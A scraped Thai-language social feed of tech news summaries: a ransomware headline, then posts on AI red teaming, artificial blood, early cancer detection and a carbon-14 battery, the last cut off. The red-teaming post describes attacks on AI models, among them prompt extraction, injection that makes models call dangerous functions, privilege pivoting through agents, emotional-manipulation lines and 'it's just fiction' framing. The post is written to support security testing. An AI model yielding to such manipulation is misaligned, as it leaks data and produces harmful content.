https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    HACKREAD.COM
    OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 Comments 0 Shares 312 Views 0 Reviews
  • เรื่องเล่าจากสนามทดสอบ: เมื่อ AI Red Teams ทำหน้าที่ “เจาะก่อนเจ็บ”

    เมื่อ “AI Red Teams” กลายเป็นด่านหน้าในการค้นหาช่องโหว่ของระบบปัญญาประดิษฐ์ ก่อนที่แฮกเกอร์ตัวจริงจะลงมือ โดยใช้เทคนิคตั้งแต่ prompt injection ไปจนถึง privilege escalation เพื่อทดสอบความปลอดภัยและความปลอดภัยของโมเดล AI ที่กำลังถูกนำไปใช้ในธุรกิจทั่วโลก

    ในยุคที่ AI ไม่ได้เป็นแค่เครื่องมือ แต่เป็นผู้ช่วยตัดสินใจในองค์กร การรักษาความปลอดภัยของระบบ AI จึงไม่ใช่เรื่องรองอีกต่อไป ทีม Red Team ที่เชี่ยวชาญด้าน AI ได้พัฒนาเทคนิคใหม่ในการเจาะระบบ เช่น:
    - การหลอกให้โมเดลละเมิดข้อจำกัดด้วย prompt ที่ดูเหมือนไม่เป็นอันตราย
    - การใช้ emotional manipulation เช่น “คุณเข้าใจผิด” หรือ “ช่วยฉันเถอะ ฉุกเฉินมาก”
    - การเจาะ backend โดยตรงผ่าน creative injection และ endpoint targeting
    - การใช้โมเดลในฐานะตัวแทนผู้ใช้เพื่อขยายสิทธิ์โดยไม่ได้รับอนุญาต (access pivoting)

    เป้าหมายไม่ใช่แค่ “ทำให้โมเดลพัง” แต่เพื่อค้นหาว่าโมเดลจะตอบสนองอย่างไรเมื่อถูกโจมตีจริง และจะสามารถป้องกันได้หรือไม่

    AI Red Teams คือทีมที่ใช้เทคนิคเจาะระบบเพื่อค้นหาช่องโหว่ในโมเดล AI ก่อนที่แฮกเกอร์จะพบ
    ใช้เทคนิค prompt injection, privilege escalation, emotional manipulation
    ทดสอบทั้งด้าน security (ป้องกัน AI จากโลกภายนอก) และ safety (ป้องกันโลกจาก AI)

    โมเดล AI มีลักษณะไม่แน่นอน (non-deterministic) ทำให้พฤติกรรมเปลี่ยนแม้ใช้ input เดิม
    ทำให้การทดสอบต้องใช้หลายรอบและหลากหลายบริบท
    การเจาะระบบต้องอาศัยทั้งเทคนิคและความเข้าใจเชิงพฤติกรรม

    ตัวอย่างเทคนิคที่ใช้ในการ red teaming
    Prompt extraction: ดึงคำสั่งระบบที่ซ่อนอยู่
    Endpoint targeting: เจาะ backend โดยตรง
    Creative injection: หลอกให้โมเดลเรียกใช้ฟังก์ชันอันตราย
    Access pivoting: ใช้สิทธิ์ของ AI agent เพื่อเข้าถึงข้อมูลที่ผู้ใช้ไม่มีสิทธิ์

    Red Teams พบช่องโหว่ในระบบจริง เช่น context window failure และ fallback behavior ที่ไม่ปลอดภัย
    โมเดลลืมคำสั่งเดิมเมื่อบทสนทนายาวเกินไป
    ตอบคำถามด้วยข้อมูลผิดหรือไม่ชัดเจนเมื่อไม่สามารถดึงข้อมูลได้

    พบปัญหา privilege creep และการเข้าถึงข้อมูลเกินสิทธิ์ผ่าน AI interfaces
    ผู้ใช้ระดับต่ำสามารถเข้าถึงข้อมูลระดับผู้บริหารได้
    โมเดลไม่ตรวจสอบสิทธิ์อย่างเหมาะสมเมื่อเรียกข้อมูล

    Prompt injection สามารถทำให้โมเดลละเมิดข้อจำกัดและให้ข้อมูลอันตรายได้
    เช่น การเปลี่ยนคำถามเป็น “แค่เรื่องแต่ง” เพื่อให้โมเดลตอบคำถามผิดกฎหมาย
    อาจนำไปสู่การสร้างเนื้อหาที่เป็นอันตรายหรือผิดจรรยาบรรณ

    ระบบ AI ที่เชื่อมต่อกับเครื่องมือภายนอก เช่น API หรือฐานข้อมูล เสี่ยงต่อการ privilege escalation
    โมเดลอาจเรียกใช้ฟังก์ชันที่ผู้ใช้ไม่มีสิทธิ์
    ส่งผลให้ข้อมูลภายในองค์กรรั่วไหลโดยไม่ตั้งใจ

    การไม่ตรวจสอบ context และ scope อย่างเข้มงวดอาจทำให้โมเดลทำงานผิดพลาด
    เช่น ลืมว่าอยู่ในโหมด onboarding แล้วไปดึงข้อมูล performance review
    ทำให้เกิดการละเมิดความเป็นส่วนตัวในระบบที่มีความไวสูง

    ระบบ prompt ที่ใช้ควบคุมพฤติกรรมของโมเดลอาจรั่วไหลได้ผ่าน prompt extraction
    อาจเผยให้เห็น API key หรือคำสั่งภายในที่ควบคุมโมเดล
    เป็นเป้าหมายสำคัญของผู้โจมตีที่ต้องการเข้าใจตรรกะของระบบ

    https://www.csoonline.com/article/4029862/how-ai-red-teams-find-hidden-flaws-before-attackers-do.html
    🧠 เรื่องเล่าจากสนามทดสอบ: เมื่อ AI Red Teams ทำหน้าที่ “เจาะก่อนเจ็บ” เมื่อ “AI Red Teams” กลายเป็นด่านหน้าในการค้นหาช่องโหว่ของระบบปัญญาประดิษฐ์ ก่อนที่แฮกเกอร์ตัวจริงจะลงมือ โดยใช้เทคนิคตั้งแต่ prompt injection ไปจนถึง privilege escalation เพื่อทดสอบความปลอดภัยและความปลอดภัยของโมเดล AI ที่กำลังถูกนำไปใช้ในธุรกิจทั่วโลก ในยุคที่ AI ไม่ได้เป็นแค่เครื่องมือ แต่เป็นผู้ช่วยตัดสินใจในองค์กร การรักษาความปลอดภัยของระบบ AI จึงไม่ใช่เรื่องรองอีกต่อไป ทีม Red Team ที่เชี่ยวชาญด้าน AI ได้พัฒนาเทคนิคใหม่ในการเจาะระบบ เช่น: - การหลอกให้โมเดลละเมิดข้อจำกัดด้วย prompt ที่ดูเหมือนไม่เป็นอันตราย - การใช้ emotional manipulation เช่น “คุณเข้าใจผิด” หรือ “ช่วยฉันเถอะ ฉุกเฉินมาก” - การเจาะ backend โดยตรงผ่าน creative injection และ endpoint targeting - การใช้โมเดลในฐานะตัวแทนผู้ใช้เพื่อขยายสิทธิ์โดยไม่ได้รับอนุญาต (access pivoting) เป้าหมายไม่ใช่แค่ “ทำให้โมเดลพัง” แต่เพื่อค้นหาว่าโมเดลจะตอบสนองอย่างไรเมื่อถูกโจมตีจริง และจะสามารถป้องกันได้หรือไม่ ✅ AI Red Teams คือทีมที่ใช้เทคนิคเจาะระบบเพื่อค้นหาช่องโหว่ในโมเดล AI ก่อนที่แฮกเกอร์จะพบ ➡️ ใช้เทคนิค prompt injection, privilege escalation, emotional manipulation ➡️ ทดสอบทั้งด้าน security (ป้องกัน AI จากโลกภายนอก) และ safety (ป้องกันโลกจาก AI) ✅ โมเดล AI มีลักษณะไม่แน่นอน (non-deterministic) ทำให้พฤติกรรมเปลี่ยนแม้ใช้ input เดิม ➡️ ทำให้การทดสอบต้องใช้หลายรอบและหลากหลายบริบท ➡️ การเจาะระบบต้องอาศัยทั้งเทคนิคและความเข้าใจเชิงพฤติกรรม ✅ ตัวอย่างเทคนิคที่ใช้ในการ red teaming ➡️ Prompt extraction: ดึงคำสั่งระบบที่ซ่อนอยู่ ➡️ Endpoint targeting: เจาะ backend โดยตรง ➡️ Creative injection: หลอกให้โมเดลเรียกใช้ฟังก์ชันอันตราย ➡️ Access pivoting: ใช้สิทธิ์ของ AI agent เพื่อเข้าถึงข้อมูลที่ผู้ใช้ไม่มีสิทธิ์ ✅ Red Teams พบช่องโหว่ในระบบจริง เช่น context window failure และ fallback behavior ที่ไม่ปลอดภัย ➡️ โมเดลลืมคำสั่งเดิมเมื่อบทสนทนายาวเกินไป ➡️ ตอบคำถามด้วยข้อมูลผิดหรือไม่ชัดเจนเมื่อไม่สามารถดึงข้อมูลได้ ✅ พบปัญหา privilege creep และการเข้าถึงข้อมูลเกินสิทธิ์ผ่าน AI interfaces ➡️ ผู้ใช้ระดับต่ำสามารถเข้าถึงข้อมูลระดับผู้บริหารได้ ➡️ โมเดลไม่ตรวจสอบสิทธิ์อย่างเหมาะสมเมื่อเรียกข้อมูล ‼️ Prompt injection สามารถทำให้โมเดลละเมิดข้อจำกัดและให้ข้อมูลอันตรายได้ ⛔ เช่น การเปลี่ยนคำถามเป็น “แค่เรื่องแต่ง” เพื่อให้โมเดลตอบคำถามผิดกฎหมาย ⛔ อาจนำไปสู่การสร้างเนื้อหาที่เป็นอันตรายหรือผิดจรรยาบรรณ ‼️ ระบบ AI ที่เชื่อมต่อกับเครื่องมือภายนอก เช่น API หรือฐานข้อมูล เสี่ยงต่อการ privilege escalation ⛔ โมเดลอาจเรียกใช้ฟังก์ชันที่ผู้ใช้ไม่มีสิทธิ์ ⛔ ส่งผลให้ข้อมูลภายในองค์กรรั่วไหลโดยไม่ตั้งใจ ‼️ การไม่ตรวจสอบ context และ scope อย่างเข้มงวดอาจทำให้โมเดลทำงานผิดพลาด ⛔ เช่น ลืมว่าอยู่ในโหมด onboarding แล้วไปดึงข้อมูล performance review ⛔ ทำให้เกิดการละเมิดความเป็นส่วนตัวในระบบที่มีความไวสูง ‼️ ระบบ prompt ที่ใช้ควบคุมพฤติกรรมของโมเดลอาจรั่วไหลได้ผ่าน prompt extraction ⛔ อาจเผยให้เห็น API key หรือคำสั่งภายในที่ควบคุมโมเดล ⛔ เป็นเป้าหมายสำคัญของผู้โจมตีที่ต้องการเข้าใจตรรกะของระบบ https://www.csoonline.com/article/4029862/how-ai-red-teams-find-hidden-flaws-before-attackers-do.html
    WWW.CSOONLINE.COM
    How AI red teams find hidden flaws before attackers do
    As generative AI transforms business, security experts are adapting hacking techniques to discover vulnerabilities in intelligent systems — from prompt injection to privilege escalation.
    0 Comments 0 Shares 292 Views 0 Reviews
  • เรื่องเล่าจากห้องแล็บ: เมื่อ “เลือดผง” กลายเป็นความหวังใหม่ของชีวิต

    ในห้องทดลองของมหาวิทยาลัย Maryland นักวิจัยกำลังเผชิญกับหนึ่งในความท้าทายที่ใหญ่ที่สุดของการแพทย์ฉุกเฉิน—การให้เลือดแก่ผู้บาดเจ็บที่อยู่ห่างไกลจากโรงพยาบาล

    คำตอบของพวกเขาไม่ใช่ถุงเลือดแช่เย็น แต่เป็น “เลือดเทียมในรูปแบบผง” ที่สามารถเก็บไว้ได้นานหลายปีโดยไม่ต้องแช่เย็น และสามารถนำมาใช้ได้ทันทีเพียงแค่เติมน้ำ! ผลิตภัณฑ์นี้มีชื่อว่า ErythroMer ซึ่งสร้างจากฮีโมโกลบินที่สกัดจากเลือดหมดอายุ แล้วห่อหุ้มด้วยไขมันเพื่อสร้างเซลล์เม็ดเลือดแดงเทียมที่ปลอดภัย

    เมื่อทดลองกับกระต่ายที่ถูกจำลองภาวะเสียเลือดรุนแรง พบว่าหลังได้รับเลือดเทียมเพียง 3 เข็ม กระต่ายฟื้นตัวอย่างรวดเร็ว สีผิวกลับมาเป็นสีชมพูสดใส แสดงว่าร่างกายได้รับออกซิเจนอย่างมีประสิทธิภาพ

    ErythroMer คือเลือดเทียมชนิดผงที่สามารถเก็บไว้ได้นานโดยไม่ต้องแช่เย็น
    ผลิตจากฮีโมโกลบินที่สกัดจากเลือดหมดอายุ แล้วห่อหุ้มด้วยไขมันเพื่อป้องกันพิษ
    สามารถเติมน้ำเพื่อใช้งานทันทีในสถานการณ์ฉุกเฉิน

    การทดลองในสัตว์แสดงผลลัพธ์ที่น่าประทับใจ
    กระต่ายที่อยู่ในภาวะช็อกฟื้นตัวอย่างรวดเร็วหลังได้รับเลือดเทียม
    สีผิวและพฤติกรรมกลับมาเป็นปกติภายในไม่กี่นาที

    กระทรวงกลาโหมสหรัฐฯ ลงทุนกว่า 58 ล้านดอลลาร์เพื่อพัฒนาเทคโนโลยีนี้
    หวังใช้ในสนามรบที่การเสียเลือดยังเป็นสาเหตุการเสียชีวิตที่ป้องกันได้อันดับหนึ่ง
    สามารถช่วยชีวิตทหารและพลเรือนในพื้นที่ห่างไกล

    เลือดเทียมสามารถขนส่งง่ายและใช้ได้ทันทีในจุดเกิดเหตุ
    ไม่ต้องรอรถพยาบาลหรือการเคลื่อนย้ายผู้ป่วย
    เหมาะสำหรับอุบัติเหตุ, ภัยพิบัติ, และพื้นที่ห่างไกล

    ยังไม่มีการทดลองในมนุษย์ แต่มีความหวังสูง
    ทีมวิจัยในญี่ปุ่นเริ่มทดลองในมนุษย์แล้ว
    ผู้เชี่ยวชาญบางคนยังคงสงวนท่าที รอผลจากการทดลองขนาดใหญ่

    ยังไม่มีการรับรองจาก FDA สำหรับการใช้ในมนุษย์
    ต้องพิสูจน์ความปลอดภัยและประสิทธิภาพในระดับคลินิกก่อน
    การทดลองในสัตว์ยังไม่สามารถยืนยันผลในมนุษย์ได้

    การใช้ฮีโมโกลบินที่ไม่ได้ห่อหุ้มอาจเป็นพิษต่ออวัยวะ
    ความพยายามในอดีตล้มเหลวเพราะฮีโมโกลบินที่สัมผัสโดยตรงกับร่างกาย
    การห่อหุ้มด้วยไขมันเป็นนวัตกรรมที่ช่วยลดความเสี่ยงนี้

    การผลิตและการขยายขนาดอาจเผชิญกับความท้าทายด้านต้นทุนและเทคโนโลยี
    ต้องพัฒนาเทคโนโลยีให้สามารถผลิตในปริมาณมากโดยไม่ลดคุณภาพ
    ต้องมีระบบควบคุมคุณภาพที่เข้มงวดเพื่อความปลอดภัย

    การทดลองในสัตว์ต้องใช้การุณยฆาตเพื่อศึกษาผลกระทบต่ออวัยวะ
    แม้จะเป็นไปตามหลักจริยธรรม แต่ยังเป็นประเด็นที่ถกเถียงในวงการวิทยาศาสตร์
    ต้องมีการตรวจสอบผลกระทบระยะยาวต่อเนื้อเยื่อและระบบต่างๆ

    https://www.techspot.com/news/108813-researchers-create-artificial-blood-spot-use-accidents-combat.html
    🩸 เรื่องเล่าจากห้องแล็บ: เมื่อ “เลือดผง” กลายเป็นความหวังใหม่ของชีวิต ในห้องทดลองของมหาวิทยาลัย Maryland นักวิจัยกำลังเผชิญกับหนึ่งในความท้าทายที่ใหญ่ที่สุดของการแพทย์ฉุกเฉิน—การให้เลือดแก่ผู้บาดเจ็บที่อยู่ห่างไกลจากโรงพยาบาล คำตอบของพวกเขาไม่ใช่ถุงเลือดแช่เย็น แต่เป็น “เลือดเทียมในรูปแบบผง” ที่สามารถเก็บไว้ได้นานหลายปีโดยไม่ต้องแช่เย็น และสามารถนำมาใช้ได้ทันทีเพียงแค่เติมน้ำ! ผลิตภัณฑ์นี้มีชื่อว่า ErythroMer ซึ่งสร้างจากฮีโมโกลบินที่สกัดจากเลือดหมดอายุ แล้วห่อหุ้มด้วยไขมันเพื่อสร้างเซลล์เม็ดเลือดแดงเทียมที่ปลอดภัย เมื่อทดลองกับกระต่ายที่ถูกจำลองภาวะเสียเลือดรุนแรง พบว่าหลังได้รับเลือดเทียมเพียง 3 เข็ม กระต่ายฟื้นตัวอย่างรวดเร็ว สีผิวกลับมาเป็นสีชมพูสดใส แสดงว่าร่างกายได้รับออกซิเจนอย่างมีประสิทธิภาพ ✅ ErythroMer คือเลือดเทียมชนิดผงที่สามารถเก็บไว้ได้นานโดยไม่ต้องแช่เย็น ➡️ ผลิตจากฮีโมโกลบินที่สกัดจากเลือดหมดอายุ แล้วห่อหุ้มด้วยไขมันเพื่อป้องกันพิษ ➡️ สามารถเติมน้ำเพื่อใช้งานทันทีในสถานการณ์ฉุกเฉิน ✅ การทดลองในสัตว์แสดงผลลัพธ์ที่น่าประทับใจ ➡️ กระต่ายที่อยู่ในภาวะช็อกฟื้นตัวอย่างรวดเร็วหลังได้รับเลือดเทียม ➡️ สีผิวและพฤติกรรมกลับมาเป็นปกติภายในไม่กี่นาที ✅ กระทรวงกลาโหมสหรัฐฯ ลงทุนกว่า 58 ล้านดอลลาร์เพื่อพัฒนาเทคโนโลยีนี้ ➡️ หวังใช้ในสนามรบที่การเสียเลือดยังเป็นสาเหตุการเสียชีวิตที่ป้องกันได้อันดับหนึ่ง ➡️ สามารถช่วยชีวิตทหารและพลเรือนในพื้นที่ห่างไกล ✅ เลือดเทียมสามารถขนส่งง่ายและใช้ได้ทันทีในจุดเกิดเหตุ ➡️ ไม่ต้องรอรถพยาบาลหรือการเคลื่อนย้ายผู้ป่วย ➡️ เหมาะสำหรับอุบัติเหตุ, ภัยพิบัติ, และพื้นที่ห่างไกล ✅ ยังไม่มีการทดลองในมนุษย์ แต่มีความหวังสูง ➡️ ทีมวิจัยในญี่ปุ่นเริ่มทดลองในมนุษย์แล้ว ➡️ ผู้เชี่ยวชาญบางคนยังคงสงวนท่าที รอผลจากการทดลองขนาดใหญ่ ‼️ ยังไม่มีการรับรองจาก FDA สำหรับการใช้ในมนุษย์ ⛔ ต้องพิสูจน์ความปลอดภัยและประสิทธิภาพในระดับคลินิกก่อน ⛔ การทดลองในสัตว์ยังไม่สามารถยืนยันผลในมนุษย์ได้ ‼️ การใช้ฮีโมโกลบินที่ไม่ได้ห่อหุ้มอาจเป็นพิษต่ออวัยวะ ⛔ ความพยายามในอดีตล้มเหลวเพราะฮีโมโกลบินที่สัมผัสโดยตรงกับร่างกาย ⛔ การห่อหุ้มด้วยไขมันเป็นนวัตกรรมที่ช่วยลดความเสี่ยงนี้ ‼️ การผลิตและการขยายขนาดอาจเผชิญกับความท้าทายด้านต้นทุนและเทคโนโลยี ⛔ ต้องพัฒนาเทคโนโลยีให้สามารถผลิตในปริมาณมากโดยไม่ลดคุณภาพ ⛔ ต้องมีระบบควบคุมคุณภาพที่เข้มงวดเพื่อความปลอดภัย ‼️ การทดลองในสัตว์ต้องใช้การุณยฆาตเพื่อศึกษาผลกระทบต่ออวัยวะ ⛔ แม้จะเป็นไปตามหลักจริยธรรม แต่ยังเป็นประเด็นที่ถกเถียงในวงการวิทยาศาสตร์ ⛔ ต้องมีการตรวจสอบผลกระทบระยะยาวต่อเนื้อเยื่อและระบบต่างๆ https://www.techspot.com/news/108813-researchers-create-artificial-blood-spot-use-accidents-combat.html
    WWW.TECHSPOT.COM
    Researchers create artificial blood for on-the-spot use in accidents and combat
    Inside a specialized intensive care unit for rabbits, Dr. Allan Doctor and his team simulate the trauma of severe blood loss. They drain a rabbit's blood to...
    0 Comments 0 Shares 348 Views 0 Reviews
  • เรื่องเล่าจากหลอดเลือด: มะเร็งอาจถูกจับได้ตั้งแต่ก่อนแสดงอาการ 3 ปี

    การศึกษานี้ตีพิมพ์ในวารสาร Cancer Discovery เมื่อเดือนพฤษภาคม 2025 โดยใช้ข้อมูลจากตัวอย่างเลือดของคนที่เข้าร่วมการติดตามสุขภาพตั้งแต่ยุค 1980–1990 ซึ่งเก็บตัวอย่างไว้ก่อนผู้ป่วยได้รับการวินิจฉัยโรคจริงหลายปี

    ทีมวิจัยใช้เทคนิค Whole Genome Sequencing บนพลาสมาในเลือด ซึ่งแม้จะมีเพียง “หนึ่งช้อนชา” ก็สามารถจับสัญญาณของ DNA ที่มีการกลายพันธุ์เฉพาะเจาะจงที่เกี่ยวข้องกับมะเร็งได้สำเร็จ

    แม้ตัวอย่างจะถูกเก็บไว้นานหลายสิบปี และไม่ได้เตรียมไว้เพื่อการตรวจพันธุกรรมโดยตรง แต่ผลลัพธ์ก็แม่นยำพอที่จะตรวจพบสัญญาณเริ่มต้นของมะเร็ง เช่น รหัสพันธุกรรมที่บ่งชี้ถึงโรคในระดับต่ำมาก

    หากตรวจพบก่อนแสดงอาการได้แม้เพียง “ไม่กี่เดือน” ก็อาจเพิ่มโอกาสการรักษาได้มากขึ้น — แต่ถ้าตรวจพบ “ก่อนหลายปี” ก็อาจป้องกันได้ตั้งแต่ยังไม่เกิดโรคจริง

    นักวิจัยหวังว่าการตรวจเช่นนี้จะกลายเป็น เครื่องมือคัดกรองเชิงรุก ในอนาคต โดยกำลังขยายการทดลองไปยังประชากรกลุ่มใหญ่กว่าเดิมเพื่อยืนยันผล

    ยังเป็นงานวิจัยระดับ proof-of-concept
    ต้องมีการทดลองในกลุ่มประชากรขนาดใหญ่ขึ้นเพื่อยืนยันผลและความแม่นยำ

    ตัวอย่างเลือดที่ใช้เก่าและไม่มีการเก็บแบบ preserve DNA โดยเฉพาะ
    อาจส่งผลต่อคุณภาพและความไวของการตรวจในชีวิตจริง

    ปัจจุบันยังไม่มีเทคโนโลยีสำหรับ “กำจัดเซลล์ก่อนมะเร็ง” หลังพบ DNA
    ความสามารถในการรักษายังตามหลังการวินิจฉัยเชิงลึกอยู่พอสมควร

    การตรวจ Whole Genome Sequencing ยังมีค่าใช้จ่ายสูง
    อาจไม่เหมาะกับการใช้งานทั่วไปหรือเป็นการตรวจประจำในคลินิกทั่วโลกตอนนี้

    https://www.sciencenews.org/article/cancer-tumor-dna-blood-test-screening
    🎙️ เรื่องเล่าจากหลอดเลือด: มะเร็งอาจถูกจับได้ตั้งแต่ก่อนแสดงอาการ 3 ปี การศึกษานี้ตีพิมพ์ในวารสาร Cancer Discovery เมื่อเดือนพฤษภาคม 2025 โดยใช้ข้อมูลจากตัวอย่างเลือดของคนที่เข้าร่วมการติดตามสุขภาพตั้งแต่ยุค 1980–1990 ซึ่งเก็บตัวอย่างไว้ก่อนผู้ป่วยได้รับการวินิจฉัยโรคจริงหลายปี ✅ ทีมวิจัยใช้เทคนิค Whole Genome Sequencing บนพลาสมาในเลือด ซึ่งแม้จะมีเพียง “หนึ่งช้อนชา” ก็สามารถจับสัญญาณของ DNA ที่มีการกลายพันธุ์เฉพาะเจาะจงที่เกี่ยวข้องกับมะเร็งได้สำเร็จ ✅ แม้ตัวอย่างจะถูกเก็บไว้นานหลายสิบปี และไม่ได้เตรียมไว้เพื่อการตรวจพันธุกรรมโดยตรง แต่ผลลัพธ์ก็แม่นยำพอที่จะตรวจพบสัญญาณเริ่มต้นของมะเร็ง เช่น รหัสพันธุกรรมที่บ่งชี้ถึงโรคในระดับต่ำมาก ✅ หากตรวจพบก่อนแสดงอาการได้แม้เพียง “ไม่กี่เดือน” ก็อาจเพิ่มโอกาสการรักษาได้มากขึ้น — แต่ถ้าตรวจพบ “ก่อนหลายปี” ก็อาจป้องกันได้ตั้งแต่ยังไม่เกิดโรคจริง ✅ นักวิจัยหวังว่าการตรวจเช่นนี้จะกลายเป็น เครื่องมือคัดกรองเชิงรุก ในอนาคต โดยกำลังขยายการทดลองไปยังประชากรกลุ่มใหญ่กว่าเดิมเพื่อยืนยันผล ‼️ ยังเป็นงานวิจัยระดับ proof-of-concept ⛔ ต้องมีการทดลองในกลุ่มประชากรขนาดใหญ่ขึ้นเพื่อยืนยันผลและความแม่นยำ ‼️ ตัวอย่างเลือดที่ใช้เก่าและไม่มีการเก็บแบบ preserve DNA โดยเฉพาะ ⛔ อาจส่งผลต่อคุณภาพและความไวของการตรวจในชีวิตจริง ‼️ ปัจจุบันยังไม่มีเทคโนโลยีสำหรับ “กำจัดเซลล์ก่อนมะเร็ง” หลังพบ DNA ⛔ ความสามารถในการรักษายังตามหลังการวินิจฉัยเชิงลึกอยู่พอสมควร ‼️ การตรวจ Whole Genome Sequencing ยังมีค่าใช้จ่ายสูง ⛔ อาจไม่เหมาะกับการใช้งานทั่วไปหรือเป็นการตรวจประจำในคลินิกทั่วโลกตอนนี้ https://www.sciencenews.org/article/cancer-tumor-dna-blood-test-screening
    WWW.SCIENCENEWS.ORG
    Cancer DNA is detectable in blood years before diagnosis
    Tiny, newly formed tumors shed small fragments of DNA that are swept into the bloodstream. Future cancer screening tests could detect them early.
    0 Comments 0 Shares 295 Views 0 Reviews
  • เรื่องเล่าจากห้องวิจัย: แบตเตอรี่กัมมันตรังสีที่อาจไม่ต้องชาร์จอีกเลย

    ทีมนักวิจัยจาก Daegu Gyeongbuk Institute of Science and Technology (DGIST) นำโดยศาสตราจารย์ Su-Il In ได้พัฒนาแบตเตอรี่ชนิดใหม่ที่เรียกว่า “Perovskite Betavoltaic Cell” (PBC) ซึ่งใช้พลังงานจากการสลายตัวของคาร์บอน-14 (Carbon-14) เพื่อผลิตไฟฟ้าอย่างต่อเนื่องนานหลายสิบปี โดยไม่ต้องชาร์จ

    แบตเตอรี่ชนิดนี้ใช้อนุภาคคาร์บอน-14 ร่วมกับ quantum dots เป็นขั้วไฟฟ้า และเคลือบด้วยฟิล์ม perovskite ที่เสริมความเสถียรด้วยสารเติมแต่งคลอรีนสองชนิด (MACl และ CsCl) เพื่อเพิ่มการเคลื่อนที่ของอิเล็กตรอนถึง 56,000 เท่าเมื่อเทียบกับรุ่นก่อน

    แม้จะยังมีประสิทธิภาพต่ำกว่าแบตเตอรี่ลิเธียมไอออนทั่วไป แต่การออกแบบให้มีคาร์บอน-14 ทั้งขั้วบวกและลบช่วยเพิ่มการแผ่รังสีเบต้าและลดการสูญเสียพลังงาน ทำให้สามารถใช้งานได้นานหลายร้อยปี เหมาะกับอุปกรณ์ที่ต้องการพลังงานต่ำแต่ต่อเนื่อง เช่น pacemaker, โดรน, probe อวกาศ หรืออุปกรณ์ในสภาพแวดล้อมสุดขั้ว

    ทีมนักวิจัยจาก DGIST พัฒนาแบตเตอรี่แบบ betavoltaic โดยใช้ perovskite
    เป็นการรวม perovskite กับแหล่งพลังงานกัมมันตรังสีเป็นครั้งแรก

    ใช้คาร์บอน-14 ซึ่งปล่อยรังสีเบต้าอย่างปลอดภัย
    ไม่ทะลุผิวหนังและสามารถป้องกันได้ด้วยอะลูมิเนียม

    ฟิล์ม perovskite เสริมด้วย MACl และ CsCl เพื่อเพิ่มความเสถียร
    เพิ่ม electron mobility ได้ถึง 56,000 เท่า

    ใช้ titanium dioxide ร่วมกับ dye ที่ผ่านการบำบัดด้วยกรดซิตริก
    เกิดปฏิกิริยา avalanche ของอิเล็กตรอนเมื่อโดนรังสีเบต้า

    ประสิทธิภาพการแปลงพลังงานเพิ่มจาก 0.48% เป็น 2.86%
    แม้ยังต่ำ แต่ถือเป็นก้าวสำคัญของเทคโนโลยีนี้

    คาร์บอน-14 เป็นผลพลอยได้จากโรงไฟฟ้านิวเคลียร์
    ราคาถูก หาง่าย และสามารถนำกลับมาใช้ใหม่ได้

    มีแผนพัฒนาเพื่อใช้ในอุปกรณ์ขนาดเล็ก เช่น pacemaker, โดรน, probe อวกาศ
    “พลังงานนิวเคลียร์ในอุปกรณ์ขนาดเท่านิ้ว” ตามคำกล่าวของศาสตราจารย์ In

    ประสิทธิภาพยังต่ำกว่าแบตเตอรี่ลิเธียมไอออนทั่วไป
    ต้องปรับปรุงรูปทรงของตัวปล่อยรังสีและตัวดูดซับเพิ่มเติม

    การใช้สารกัมมันตรังสีแม้ปลอดภัย ต้องผ่านการรับรองด้านชีวภาพ
    โดยเฉพาะหากนำไปใช้ในอุปกรณ์ทางการแพทย์

    การผลิตและใช้งานในเชิงพาณิชย์ยังอยู่ในขั้นต้น
    ต้องการการพัฒนาเพิ่มเติมก่อนนำไปใช้จริง

    การจัดการคาร์บอน-14 ต้องมีระบบควบคุมที่เข้มงวด
    แม้จะปลอดภัย แต่ยังเป็นสารกัมมันตรังสีที่ต้องดูแลอย่างรอบคอบ

    https://www.neowin.net/news/this-amazing-new-battery-has-life-so-long-you-may-never-have-to-recharge/
    🎙️ เรื่องเล่าจากห้องวิจัย: แบตเตอรี่กัมมันตรังสีที่อาจไม่ต้องชาร์จอีกเลย ทีมนักวิจัยจาก Daegu Gyeongbuk Institute of Science and Technology (DGIST) นำโดยศาสตราจารย์ Su-Il In ได้พัฒนาแบตเตอรี่ชนิดใหม่ที่เรียกว่า “Perovskite Betavoltaic Cell” (PBC) ซึ่งใช้พลังงานจากการสลายตัวของคาร์บอน-14 (Carbon-14) เพื่อผลิตไฟฟ้าอย่างต่อเนื่องนานหลายสิบปี โดยไม่ต้องชาร์จ แบตเตอรี่ชนิดนี้ใช้อนุภาคคาร์บอน-14 ร่วมกับ quantum dots เป็นขั้วไฟฟ้า และเคลือบด้วยฟิล์ม perovskite ที่เสริมความเสถียรด้วยสารเติมแต่งคลอรีนสองชนิด (MACl และ CsCl) เพื่อเพิ่มการเคลื่อนที่ของอิเล็กตรอนถึง 56,000 เท่าเมื่อเทียบกับรุ่นก่อน แม้จะยังมีประสิทธิภาพต่ำกว่าแบตเตอรี่ลิเธียมไอออนทั่วไป แต่การออกแบบให้มีคาร์บอน-14 ทั้งขั้วบวกและลบช่วยเพิ่มการแผ่รังสีเบต้าและลดการสูญเสียพลังงาน ทำให้สามารถใช้งานได้นานหลายร้อยปี เหมาะกับอุปกรณ์ที่ต้องการพลังงานต่ำแต่ต่อเนื่อง เช่น pacemaker, โดรน, probe อวกาศ หรืออุปกรณ์ในสภาพแวดล้อมสุดขั้ว ✅ ทีมนักวิจัยจาก DGIST พัฒนาแบตเตอรี่แบบ betavoltaic โดยใช้ perovskite ➡️ เป็นการรวม perovskite กับแหล่งพลังงานกัมมันตรังสีเป็นครั้งแรก ✅ ใช้คาร์บอน-14 ซึ่งปล่อยรังสีเบต้าอย่างปลอดภัย ➡️ ไม่ทะลุผิวหนังและสามารถป้องกันได้ด้วยอะลูมิเนียม ✅ ฟิล์ม perovskite เสริมด้วย MACl และ CsCl เพื่อเพิ่มความเสถียร ➡️ เพิ่ม electron mobility ได้ถึง 56,000 เท่า ✅ ใช้ titanium dioxide ร่วมกับ dye ที่ผ่านการบำบัดด้วยกรดซิตริก ➡️ เกิดปฏิกิริยา avalanche ของอิเล็กตรอนเมื่อโดนรังสีเบต้า ✅ ประสิทธิภาพการแปลงพลังงานเพิ่มจาก 0.48% เป็น 2.86% ➡️ แม้ยังต่ำ แต่ถือเป็นก้าวสำคัญของเทคโนโลยีนี้ ✅ คาร์บอน-14 เป็นผลพลอยได้จากโรงไฟฟ้านิวเคลียร์ ➡️ ราคาถูก หาง่าย และสามารถนำกลับมาใช้ใหม่ได้ ✅ มีแผนพัฒนาเพื่อใช้ในอุปกรณ์ขนาดเล็ก เช่น pacemaker, โดรน, probe 